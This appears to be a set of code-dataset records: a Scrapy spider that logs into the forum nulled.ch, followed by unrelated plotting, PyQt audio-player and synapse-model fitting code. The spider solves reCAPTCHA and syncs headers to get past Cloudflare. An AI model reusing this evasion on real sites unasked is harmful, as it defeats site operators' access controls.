c.get(\"value\") for c in cookies\n }\n return bypass_cookies\n\n def start_requests(self):\n cookies = self.get_cookies(self.use_proxy)\n yield Request(\n url=self.login_url,\n callback=self.proceed_for_login,\n headers=self.headers,\n dont_filter=True,\n cookies=cookies,\n )\n\n def proceed_for_login(self, response):\n # Synchronize user agent for cloudfare middleware\n self.synchronize_headers(response)\n my_post_key = response.xpath(\n '//input[@name=\"my_post_key\"]/@value').extract_first()\n self.logger.info('my_post_key')\n self.logger.info(my_post_key)\n formdata = {\n \"username\": USERNAME,\n \"password\": PASSWORD,\n \"remember\": \"yes\",\n \"submit\": \"Login\",\n \"action\": \"do_login\",\n \"url\": \"\",\n \"g-recaptcha-response\": self.solve_recaptcha(response).solution.token,\n \"my_post_key\": my_post_key\n }\n self.logger.info(formdata)\n yield FormRequest.from_response(\n response,\n formxpath=self.login_form_xpath,\n formdata=formdata,\n meta=self.synchronize_meta(response),\n dont_filter=True,\n headers=self.headers,\n callback=self.parse_start\n )\n\n def parse_start(self, response):\n # Synchronize cloudfare user agent\n self.synchronize_headers(response)\n\n # Check if login failed\n self.check_if_logged_in(response)\n \n all_forums = response.xpath(self.forum_xpath).extract()\n\n # update stats\n self.crawler.stats.set_value(\"mainlist/mainlist_count\", len(all_forums))\n if not all_forums:\n self.logger.info(response.text)\n for forum_url in all_forums:\n\n # Standardize url\n if self.base_url not in forum_url:\n forum_url = self.base_url + forum_url\n if 'forum-178.html' not in forum_url:\n continue\n\n yield Request(\n url=forum_url,\n headers=self.headers,\n callback=self.parse_forum,\n meta=self.synchronize_meta(response),\n )\n\n def parse_thread(self, response):\n\n # Parse generic thread\n yield from super().parse_thread(response)\n\n # Parse generic avatar\n yield from super().parse_avatars(response)\n\n\nclass NulledChScrapper(SiteMapScrapper):\n\n spider_class = NulledChSpider\n site_name = 'nulled.ch'\n site_type = 'forum'\n", "repo_name": "ken2190/Enterprise-Forum-Scraper", "sub_path": "scraper/nulled_ch.py", "file_name": "nulled_ch.py", "file_ext": "py", "file_size_in_byte": 6141, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scraper.base_scrapper.SitemapSpider", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 73, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 75, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 77, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.ChromeOptions", "line_number": 95, "usage_type": "call"}, {"api_name": "scraper.base_scrapper.PROXY", "line_number": 99, "usage_type": "name"}, {"api_name": "scraper.base_scrapper.PROXY_USERNAME", "line_number": 99, "usage_type": "name"}, {"api_name": "scraper.base_scrapper.PROXY_PASSWORD", "line_number": 99, "usage_type": "name"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 110, "usage_type": "call"}, {"api_name": "scrapy.Request", "line_number": 120, "usage_type": "call"}, {"api_name": "scrapy.FormRequest.from_response", "line_number": 146, "usage_type": "call"}, {"api_name": "scrapy.FormRequest", "line_number": 146, "usage_type": "name"}, {"api_name": "scrapy.Request", "line_number": 177, "usage_type": "call"}, {"api_name": "scraper.base_scrapper.SiteMapScrapper", "line_number": 193, "usage_type": "name"}]} +{"seq_id": "36517577422", "text": "from typing import List\n\nimport matplotlib.patches as mpatches\n\nfrom utils.StatisticsCalculator import Statistic\n\nclass PlotDrawer:\n def draw(self, stats: List[Statistic], plotter, canvas):\n if len(stats) > 0:\n plotter.clear()\n plotter.set_ylabel('Distance')\n plotter.set_xlabel('Generation number')\n plotter.grid()\n x = [i for i in range(0, len(stats))]\n best = [stat.best for stat in stats]\n worst = [stat.worst for stat in stats]\n avg = [stat.avg for stat in stats]\n plotter.plot(x, best)\n plotter.plot(x, worst)\n plotter.plot(x, avg)\n best_legend = mpatches.Patch(color=\"blue\", label=\"Best\")\n avg_legend = mpatches.Patch(color=\"orange\", label=\"Worst\")\n worst_legend = mpatches.Patch(color=\"green\", label=\"Avg\")\n plotter.legend(handles=[best_legend, avg_legend, worst_legend])\n canvas.draw()\n", "repo_name": "Suqu13/SI_1", "sub_path": "utils/PlotDrawer.py", "file_name": "PlotDrawer.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "utils.StatisticsCalculator.Statistic", "line_number": 8, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.patches.Patch", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "34440192701", "text": "import sys\nimport os\n\nimport sqlite3\nimport audioplayer\n\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QDialog, QWidget, QFileDialog\n\nfrom interface import *\n\nif hasattr(QtCore.Qt, 'AA_EnableHighDpiScaling'):\n QtWidgets.QApplication.setAttribute(\n QtCore.Qt.AA_EnableHighDpiScaling, True)\n\nif hasattr(QtCore.Qt, 'AA_UseHighDpiPixmaps'):\n QtWidgets.QApplication.setAttribute(QtCore.Qt.AA_UseHighDpiPixmaps, True)\n\n\n# Globals\nProfileId = 0\nok = True\n\n\nclass ProfileSelection(QDialog, Ui_ProfileSelection):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_del.clicked.connect(self.deleteProfile)\n self.btn_new.clicked.connect(self.createProfile)\n self.btn_open.clicked.connect(self.openProfile)\n self.update()\n\n def update(self):\n self.combo.clear()\n data = [x[0] for x in self.cur.execute(\n \"\"\"SELECT Profile.Title FROM Profile\"\"\").fetchall()]\n self.combo.addItems(data)\n\n def deleteProfile(self):\n try:\n id = self.cur.execute(\n \"\"\"\n SELECT Profile.ProfileId FROM Profile\n WHERE Profile.Title == ?\n \"\"\",\n (self.combo.currentText(), )\n ).fetchone()[0]\n self.cur.execute(\n \"DELETE FROM Profile WHERE Profile.ProfileId == ?\", (id,))\n self.cur.execute(\n \"DELETE FROM Audio WHERE Audio.ProfileId == ?\", (id,))\n self.con.commit()\n self.update()\n except Exception:\n return\n\n def createProfile(self):\n NewProfile(self.con, self.cur).exec()\n self.update()\n self.combo.setCurrentIndex(self.combo.count() - 1)\n\n def openProfile(self):\n if self.combo.count() == 0:\n return\n global ProfileId\n ProfileId = self.cur.execute(\n \"\"\"\n SELECT Profile.ProfileId FROM Profile\n WHERE Profile.Title = ?\n \"\"\",\n (self.combo.currentText(),),\n ).fetchone()[0]\n self.close()\n\n\nclass NewProfile(QDialog, Ui_NewProfile):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_save.clicked.connect(self.saveProfile)\n self.btn_back.clicked.connect(self.close)\n\n def saveProfile(self):\n txt = self.line.text()\n if len(txt) == 0:\n return\n self.cur.execute(\"INSERT INTO Profile(Title) VALUES(?)\", (txt,))\n self.con.commit()\n self.close()\n\n\nclass ProfileInterface(QMainWindow, Ui_ProfileInterface):\n def __init__(self, db=\"db.sqlite\"):\n global ok\n super().__init__()\n self.setupUi(self)\n self.btn_add_audio.clicked.connect(self.addAudio)\n self.btn_del_audio.clicked.connect(self.delAudio)\n self.btn_new_sequence.clicked.connect(self.addSequence)\n self.btn_del_sequence.clicked.connect(self.delSequence)\n self.btn_append.clicked.connect(self.addSequenceAudio)\n self.btn_pop.clicked.connect(self.delSequenceAudio)\n self.player_btn.clicked.connect(self.startPlayer)\n self.combo.currentTextChanged.connect(self.updateSequenceList)\n self.con = sqlite3.connect(db)\n self.cur = self.con.cursor()\n f_in = open(\"startup.txt\", \"rt\", encoding=\"utf8\")\n data = int(f_in.read()[0])\n if data == 1:\n ok = False\n f_out = open(\"startup.txt\", \"w\", encoding=\"utf8\")\n print(0, file=f_out)\n f_out.close()\n self.hide()\n Hello().exec()\n if not ok:\n self.close()\n f_in.close()\n ProfileSelection(self.con, self.cur).exec()\n self.setWindowTitle(self.cur.execute(\n \"\"\"\n SELECT Profile.Title FROM Profile\n WHERE Profile.ProfileId == ?\n \"\"\",\n (ProfileId,)\n ).fetchone()[0])\n self.update_audio()\n self.updateCombo()\n self.updateSequenceList()\n\n def update_audio(self):\n self.audio_list.clear()\n table_data = self.cur.execute(\n \"\"\"\n SELECT Audio.Title FROM Audio\n WHERE Audio.ProfileId == ?\n \"\"\",\n (ProfileId,)\n ).fetchall()\n self.audioList = [x[0] for x in self.cur.execute(\n \"\"\"\n SELECT Audio.AudioId FROM Audio\n INNER JOIN Profile\n ON Audio.ProfileId = Profile.ProfileId\n \"\"\"\n ).fetchall()]\n table_data = [x[0] for x in table_data]\n if len(table_data) > 0:\n self.audio_list.addItems(table_data)\n\n def updateSequenceList(self):\n self.sequence_list.clear()\n try:\n self.SequenceId = self.cur.execute(\n \"\"\"\n SELECT Sequence.SequenceId FROM Sequence\n WHERE Sequence.Title == ?\n \"\"\", (self.combo.currentText(), )\n ).fetchone()[0]\n self.currentSequence = self.cur.execute(\n \"\"\"\n SELECT Audio.Title, Audio.Path FROM Audio\n INNER JOIN AudioSequence\n ON Audio.AudioId = AudioSequence.AudioId\n WHERE AudioSequence.SequenceId = ?\n ORDER BY AudioSequence.i\n \"\"\", (self.SequenceId, )\n ).fetchall()\n self.iMax = len(self.currentSequence)\n self.sequence_list.clear()\n table_data = [data[0] for data in self.currentSequence]\n if len(table_data) > 0:\n self.sequence_list.addItems(table_data)\n except Exception:\n return\n\n def addSequenceAudio(self):\n self.cur.execute(\n \"\"\"\n INSERT INTO AudioSequence(AudioId, i, SequenceId)\n VALUES(?, ?, ?)\n \"\"\",\n (self.audioList[self.audio_list.currentRow()],\n self.iMax, self.SequenceId)\n )\n self.con.commit()\n self.updateSequenceList()\n\n def delSequenceAudio(self):\n self.cur.execute(\n \"\"\"\n DELETE FROM AudioSequence\n WHERE AudioSequence.SequenceId == ? AND AudioSequence.i == ?\n \"\"\",\n (self.SequenceId, self.iMax - 1)\n )\n self.con.commit()\n self.updateSequenceList()\n\n def updateCombo(self):\n self.combo.clear()\n data = [x[0] for x in self.cur.execute(\n \"\"\"\n SELECT Sequence.Title FROM Sequence\n WHERE Sequence.ProfileId == ?\n \"\"\",\n (ProfileId,)\n ).fetchall()]\n self.combo.addItems(data)\n\n def addAudio(self):\n NewAudio(self.con, self.cur).exec()\n self.update_audio()\n\n def delAudio(self):\n if not self.audio_list.currentItem():\n return\n self.cur.execute(\n \"\"\"\n DELETE FROM Audio\n WHERE Audio.ProfileId = ? AND Audio.Title = ?\n \"\"\",\n (ProfileId, self.audio_list.currentItem().text())\n )\n self.cur.execute(\n \"\"\"\n DELETE FROM AudioSequence\n WHERE AudioSequence.AudioId in (\n SELECT Audio.AudioId FROM Audio\n WHERE Audio.ProfileId = ? AND Audio.Title = ?\n )\n \"\"\",\n (ProfileId, self.audio_list.currentItem().text())\n )\n self.con.commit()\n self.update_audio()\n\n def addSequence(self):\n NewSequence(self.con, self.cur).exec()\n self.updateCombo()\n self.combo.setCurrentIndex(self.combo.count() - 1)\n\n def delSequence(self):\n try:\n self.cur.execute(\n \"DELETE FROM AudioSequence WHERE AudioSequence.SequenceId == ?\", (self.SequenceId,))\n self.cur.execute(\n \"DELETE FROM Sequence WHERE Sequence.SequenceId == ?\", (self.SequenceId,))\n self.con.commit()\n self.updateCombo()\n except Exception:\n return\n\n def startPlayer(self):\n nw = Player(self.currentSequence)\n nw.exec()\n nw.stop()\n\n\nclass NewAudio(QDialog, Ui_NewAudio):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_select_path.clicked.connect(self.getPath)\n self.btn_cancel.clicked.connect(self.close)\n self.btn_save.clicked.connect(self.saveAudio)\n\n def getPath(self):\n self.audio_path.setText(QFileDialog.getOpenFileName(\n self, 'Выбрать аудиофайл', '', \"Аудио (*.mp3);;Все файлы (*)\")[0])\n\n def saveAudio(self):\n path = self.audio_path.text()\n title = self.audio_title.text()\n if not (os.path.isfile(path)) or len(title) == 0:\n return\n self.cur.execute(\n \"\"\"\n INSERT INTO Audio(Title, Path, ProfileId)\n VALUES(?,?,?)\n \"\"\",\n (title, path, ProfileId)\n )\n self.con.commit()\n self.close()\n\n\nclass NewSequence(QDialog, Ui_NewSequence):\n def __init__(self, con, cur):\n super().__init__()\n self.setupUi(self)\n self.con = con\n self.cur = cur\n self.btn_save.clicked.connect(self.saveProfile)\n self.btn_back.clicked.connect(self.close)\n\n def saveProfile(self):\n txt = self.line.text()\n if len(txt) == 0:\n return\n self.cur.execute(\n \"INSERT INTO Sequence(Title, ProfileId) VALUES(?, ?)\",\n (txt, ProfileId)\n )\n self.con.commit()\n self.close()\n\n\nclass Player(QDialog, Ui_Player):\n def __init__(self, data):\n super().__init__()\n self.setupUi(self)\n self.playing = False\n self.data = data\n self.i = 0\n self.current_snd = audioplayer.AudioPlayer(self.data[self.i][1])\n self.current_snd.play(loop=True)\n self.current_snd.pause()\n self.update_songs()\n self.pause_btn.clicked.connect(self.pauseresume)\n self.next_btn.clicked.connect(self.forward)\n self.prev_btn.clicked.connect(self.backwards)\n\n def pauseresume(self):\n self.playing ^= True\n if self.playing:\n self.pause_btn.setText(\"⏸\")\n self.current_snd.resume()\n else:\n self.pause_btn.setText(\"⏵\")\n self.current_snd.pause()\n\n def update_songs(self):\n self.prev.clear()\n self.now_playing.clear()\n self.next.clear()\n if (self.i > 0):\n self.prev.setText(self.data[self.i - 1][0])\n self.now_playing.setText(self.data[self.i][0])\n if (self.i < len(self.data) - 1):\n self.next.setText(self.data[self.i + 1][0])\n\n def forward(self):\n if self.i >= len(self.data) - 1:\n return\n self.i += 1\n self.current_snd.close()\n self.current_snd = audioplayer.AudioPlayer(self.data[self.i][1])\n self.current_snd.play(loop=True)\n if not self.playing:\n self.current_snd.pause()\n self.update_songs()\n\n def backwards(self):\n if self.i <= 0:\n return\n self.i -= 1\n self.current_snd.close()\n self.current_snd = audioplayer.AudioPlayer(self.data[self.i][1])\n self.current_snd.play(loop=True)\n if not self.playing:\n self.current_snd.pause()\n self.update_songs()\n\n def stop(self):\n self.current_snd.close()\n\n\nclass Hello(QDialog, Ui_Hello):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.pixmap = QPixmap(\"resources/kotik.gif\")\n self.image.setPixmap(self.pixmap)\n self.btn_hello.clicked.connect(self.stop)\n self.audio = audioplayer.AudioPlayer(\"resources/privet.mp3\")\n self.audio.play(loop=True)\n\n def stop(self):\n global ok\n ok = True\n self.audio.close()\n self.close()\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = ProfileInterface()\n ex.show()\n sys.exit(app.exec_())\n", "repo_name": "erytw/SoundBar", "sub_path": "app/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 12318, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PyQt5.QtCore.Qt", "line_number": 13, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 13, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.setAttribute", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 14, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 15, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 17, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QApplication.setAttribute", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 80, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 98, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 111, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 266, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 277, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 277, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path", "line_number": 283, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 296, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 317, "usage_type": "name"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 324, "usage_type": "call"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 356, "usage_type": "call"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 367, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 377, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 381, "usage_type": "call"}, {"api_name": "audioplayer.AudioPlayer", "line_number": 384, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 395, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 395, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 398, "usage_type": "call"}]} +{"seq_id": "15301574382", "text": "# -*- coding: utf-8 -*-\n\"\"\"Classes for updating synapse models to fit data\n\"\"\"\nfrom __future__ import annotations\n\nimport abc\nfrom numbers import Number\nimport re\nfrom typing import Any, Callable, Dict, List, Optional, Tuple\n\nimport numpy as np\n\nimport numpy_linalg as la\nimport sl_py_tools.arg_tricks as _ag\nimport sl_py_tools.iter_tricks as _it\nimport sl_py_tools.options_classes as _opt\n\nimport complex_synapse.identify.plast_seq as _ps\nimport complex_synapse.identify.synapse_id as _si\n\n# =============================================================================\nMESSAGES = (\n \"Failure, maximum iterations reached.\",\n \"Success, changes in log-likelihood and model estimate below threshold.\",\n \"Error, invalid model generated.\",\n)\n_FSPEC = re.compile(r'(\\w*?)(\\d?),(\\d?)')\n\ndef _like_str(model: str = '') -> str:\n \"\"\"TeX string for likelihood\"\"\"\n return f\"P(\\\\text{{{{data}}}}|\\\\mathbf{{{{M}}}}{model})\"\n\n\ndef _frmt_vars(format_spec: str) -> Tuple[Dict[str, str], str, str, str]:\n \"\"\"Variables for __format__ method\"\"\"\n if format_spec == \"tex\":\n return {\"t\": \"t &= {nit:d}\",\n \"tr\": \"-\\\\log \" + _like_str(\"^*\") + \" &= {true_like:.0f}\",\n \"fit\": \"-\\\\log \" + _like_str() + \" &= {nlike:.0f}\",\n \"trx\": (\"\\\\lVert\\\\mathbf{{M}}^*-\\\\mathbf{{M}}\\\\rVert &= \"\n + \"{true_dmodel:.2f}\"),\n \"dtr\": (\"\\\\log\\\\frac{{\" + _like_str('^*') + \"}}{{\"\n + _like_str() + \"}} &= {true_dlike:.0f}\"),\n \"df\": \"\\\\Delta\\\\log \" + _like_str() + \" &= {dlike:.2g}\",\n \"dx\": \"\\\\lVert\\\\Delta\\\\mathbf{{M}}\\\\rVert &= {dmodel:.2g}\",\n \"df-\": \"\\\\Delta\\\\log \" + _like_str() + \" &= -\",\n \"dx-\": \"\\\\lVert\\\\Delta\\\\mathbf{{M}}\\\\rVert &= -\",\n }, \"\\\\begin{align*} \", \" ,\\\\\\\\ \", \". \\\\end{align*}\"\n return {\"t\": \"nit = {nit}\",\n \"tr\": \"-log P(data|true) = {true_like:.3f}\",\n \"fit\": \"-log P(data|fit) = {nlike:.3f}\",\n \"trx\": \"\\n||true-fit|| = {true_dmodel:.3g}\",\n \"dtr\": \"log[P(data|true) / P(data|fit)] = {true_dlike:.3g}\",\n \"df\": \"\\nlog[P(data|fit) / P(data|prev)] = {dlike:.3g}\",\n \"dx\": \"||fit-prev|| = {dmodel:.3g}\",\n \"df-\": \"\\nlog[P(data|fit) / P(data|prev)] = ---\",\n \"dx-\": \"||fit-prev|| = ---\",\n }, \"\", \", \", \"\"\n\n\ndef _get_pos_verbosity(obj: SynapseFitter, format_spec: str):\n \"\"\"Read pos & verbosity from format_spec if possible else from obj\"\"\"\n fspec = _FSPEC.fullmatch(format_spec)\n if fspec is not None:\n format_spec = fspec[1]\n if fspec is None or not fspec[2]:\n # not from a callback, so not during\n pos = 2 * np.isfinite(obj.info['dlike'])\n else:\n pos = int(fspec[2])\n if fspec is None or not fspec[3]:\n verbose = obj.opt.disp_when()[pos] == 2\n else:\n verbose = fspec[3] == '2'\n return format_spec, pos, verbose\n\n\ndef print_callback(obj: SynapseFitter, pos: int) -> List:\n \"\"\"Callback that prints fitter state as appropriate\n\n Parameters\n ----------\n obj : SynapseFitter\n Object performing fit whose state we print.\n pos : int\n At what stage of the fit are we?\n 0: Before first iteration.\n 1: During itertions.\n 2: After completion.\n \"\"\"\n fmt = f\"{pos},{obj.opt.disp_when()[pos]}\"\n if pos == 0 and obj.opt.disp_before:\n gap = ('',) if obj.opt.disp_each else ()\n print('Before:', format(obj, fmt), *gap, sep='\\n')\n elif pos == 1 and obj.opt.disp_each:\n print('*', format(obj, fmt))\n elif pos == 2 and obj.opt.disp_after:\n gap = ('',) if obj.opt.disp_each or obj.opt.disp_before else ()\n print(*gap, 'After:', format(obj, fmt), MESSAGES[obj.info['result']],\n sep='\\n')\n return []\n\n\n# =============================================================================\n# Options class for synapse model fitters\n# =============================================================================\n\n\n# pylint: disable=too-many-ancestors\nclass SynapseFitOptions(_opt.Options):\n \"\"\"Options for synapse fitters\n\n The individual options can be accessed as object instance attributes\n (e.g. `obj.name`) or as dictionary items (e.g. `obj['name']`) for both\n getting and setting.\n\n Parameters\n ----------\n atolx : float = 1e-5\n Absolute tolerance for `dmodel`.\n atoly : float = 1e-5\n Absolute tolerance for `dlike`.\n rtolx : float = 1e-5\n Relative tolerance for `dmodel`. Multiplies `x_scale` if given.\n rtoly : float = 1e-5\n Relative tolerance for `dlike`. Multiplies `y_scale` if given.\n max_it : int = 1000\n Maximum number of iterations\n verbosity : int[0:27] = 0\n When statistics are printed, and how verbose:\n 0: do not print\n 1: after iteration\n 2: after iteration, detailed\n 3: before iteration\n 6: before iteration, detailed\n 9: each iteration\n 18: each iteration, detailed\n Values in different categories can be summed to produce combinations\n disp_step : int = 50\n Display progress update every `disp_step` iterations.\n\n All parameters are optional keywords. Any dictionary passed as positional\n parameters will be popped for the relevant items. Keyword parameters must\n be valid keys, otherwise a `KeyError` is raised.\n\n Properties\n ----------\n disp_before : int\n Display before starting iteration?\n disp_each : int\n Display at each iteration?\n disp_after : int\n Display after the end of iteration?\n They are interpreted as: 0=do not print, 1=print summary, 2=print detailed.\n They are related to `verbose` as `verbose = after + 3 * before + 9 * each`.\n \"\"\"\n prop_attributes: _opt.Attrs = ('disp_after', 'disp_before', 'disp_each')\n key_last: _opt.Attrs = ('disp_after', 'disp_before', 'disp_each')\n # Absolute tolerance for `dmodel`.\n atolx: float\n # Absolute tolerance for `dlike`.\n atoly: float\n # Relative tolerance for `dmodel`. Multiplies `x_scale` if given.\n rtolx: float\n # Relative tolerance for `dlike`. Multiplies `y_scale` if given.\n rtoly: float\n # Maximum number of iterations\n max_it: int\n # When statistics are printed, and how verbose:\n verbosity: int\n # Display progress update every `disp_step` iterations.\n disp_step: int\n\n def __init__(self, *args, **kwds) -> None:\n self.atolx = 1e-4\n self.atoly = 1e-4\n self.rtolx = 1e-4\n self.rtoly = 1e-4\n self.max_it = 1000\n self.verbosity = 1\n self.disp_step = 50\n # args = _opt.sort_dicts(args, self.prop_attributes, -1)\n # kwds = _opt.sort_dict(kwds, self.prop_attributes, -1)\n super().__init__(*args, **kwds)\n\n def set_disp_after(self, value: int) -> None:\n \"\"\"Display after the end of iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n if not 0 <= value < 3:\n raise ValueError(f\"Allowed values: 0,1,2, not {value}.\")\n change = value - self.disp_after\n if change:\n self.verbosity += change\n\n def set_disp_before(self, value: int) -> None:\n \"\"\"Display before starting iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n if not 0 <= value < 3:\n raise ValueError(f\"Allowed values: 0,1,2, not {value}.\")\n change = value - self.disp_after\n if change:\n self.verbosity += change * 3\n\n def set_disp_each(self, value: int) -> None:\n \"\"\"Display at each iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n if not 0 <= value < 3:\n raise ValueError(f\"Allowed values: 0,1,2, not {value}.\")\n change = value - self.disp_after\n if change:\n self.verbosity += change * 9\n\n @property\n def disp_after(self) -> int:\n \"\"\"Display after the end of iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n return self.verbosity % 3\n\n @property\n def disp_before(self) -> int:\n \"\"\"Display before starting iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n return (self.verbosity // 3) % 3\n\n @property\n def disp_each(self) -> int:\n \"\"\"Display at each iteration?\n\n 0: do not print, 1: print summary, 2: print detailed.\n \"\"\"\n return (self.verbosity // 9) % 3\n\n def disp_when(self) -> Tuple[int, int, int]:\n \"\"\"Tuple of (disp_before, disp_each, disp_after)\"\"\"\n return self.disp_before, self.disp_each, self.disp_after\n\n\n# =============================================================================\n# Base class for synapse model fitters\n# =============================================================================\n\n\nclass SynapseFitter(abc.ABC):\n \"\"\"Base class for synapse fitters.\n\n Parameters\n ----------\n data : PlasticitySequence\n The data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model.\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n Other keywords added to `self.opts` below.\n\n Other Attributes\n ----------------\n prev_model : Optional[SynapseIdModel]\n During iteration or after error: Previous model estimate.\n Otherwise: `None`.\n info : Dict[str, Number]\n Statistics of current state. See below.\n opt : SynapseFitOptions\n Options for iteration and termination. See below.\n\n Statistics\n ----------\n nlike : float\n Negative log-likelihood of `data` given `model`.\n dlike : float\n Decrease in negative log-likelihood of `data` given `model`.\n dmodel : float\n Distance between `model` and `prev_model`.\n nit : int\n Number of updates performed.\n x_thresh : float\n Threshold on `dmodel` for termination.\n y_thresh : float\n Threshold on `dlike` for termination.\n x_scale : float or None\n Typical scale for `dmodel`. By default, `None` -> `est.norm()`.\n y_scale : float or None\n Typical scale for `dlike`. By default, `None` -> `nlike`.\n result : int\n Flag for the outcome of fitting:\n -1: Error, invalid model generated.\n 0: Failure, maximum iterations reached.\n 1: Success, change in log-likelihood and model below threshold.\n All of the above are stored in `self.info`.\n\n Options\n -------\n atolx : float = 1e-5\n Absolute tolerance for `dmodel`.\n atoly : float = 1e-5\n Absolute tolerance for `dlike`.\n rtol : float = 1e-5\n Relative tolerance. Multiplies `x_scale` and `y_scale` if given.\n max_it : int = 1e3\n Maximum number of iterations\n verbosity : int = -2\n When statistics are printed, and how verbose:\n 0: do not print\n 1: after iteration\n 2: after iteration, detailed\n 3: before iteration\n 6: before iteration, detailed\n 9: each iteration\n 18: each iteration, detailed\n Values in different categories can be summed to produce combinations\n disp_step : int = -2\n Display progress update every `disp_step` iterations.\n All of the above are stored in `SynapseFitter.opt`.\n\n See Also\n --------\n SynapseFitOptions.\n \"\"\"\n data: _ps.PlasticitySequence\n est: _si.SynapseIdModel\n prev_est: Optional[_si.SynapseIdModel]\n # Stats of current state:\n info: Dict[str, Number]\n # options:\n opt: SynapseFitOptions\n # callback to report on each step/result\n callback: Callback\n\n def __init__(self, data: _ps.PlasticitySequence, est: _si.SynapseIdModel,\n callback: Callback = print_callback, **kwds) -> None:\n \"\"\"Base class for synapse fitters.\n\n Parameters\n ----------\n data : PlasticitySequence\n The data used to fit the synapse model.\n est : SynapseIdModel\n The initial guess/current estimate of the synapse model\n callback : Callable[[self, int]->None], optional\n Function called on every iteration, by default `print_callback`.\n Second argument:\n 0: Before first iteration.\n 1: During iterations.\n 2: After completion.\n\n Subclass should set `self.info['nlike']`.\n \"\"\"\n self.data = data\n self.est = est\n self.prev_est = None\n self.info = {'nit': 0, 'nlike': np.inf, 'dmodel': np.inf,\n 'dlike': np.inf, 'x_thresh': 0., 'y_thresh': 0.,\n 'x_scale': None, 'y_scale': None}\n self.opt = kwds.pop('opt', SynapseFitOptions())\n self.opt.update(**kwds)\n self.callback = callback\n\n def __format__(self, format_spec: str) -> str:\n \"\"\"Printing info about state of fitter\n\n Parameters\n ----------\n format_spec : str\n If it begins `'tex'`, produces a LaTeX equation environment.\n If it ends with `','`, the first digit is\n interpreted as `pos` and the second as `verbose`.\n\n For `pos`:\n 0: Before first iteration.\n 1: During itertions.\n 2: After completion.\n For `verbose`:\n 1: print summary,\n 2: print 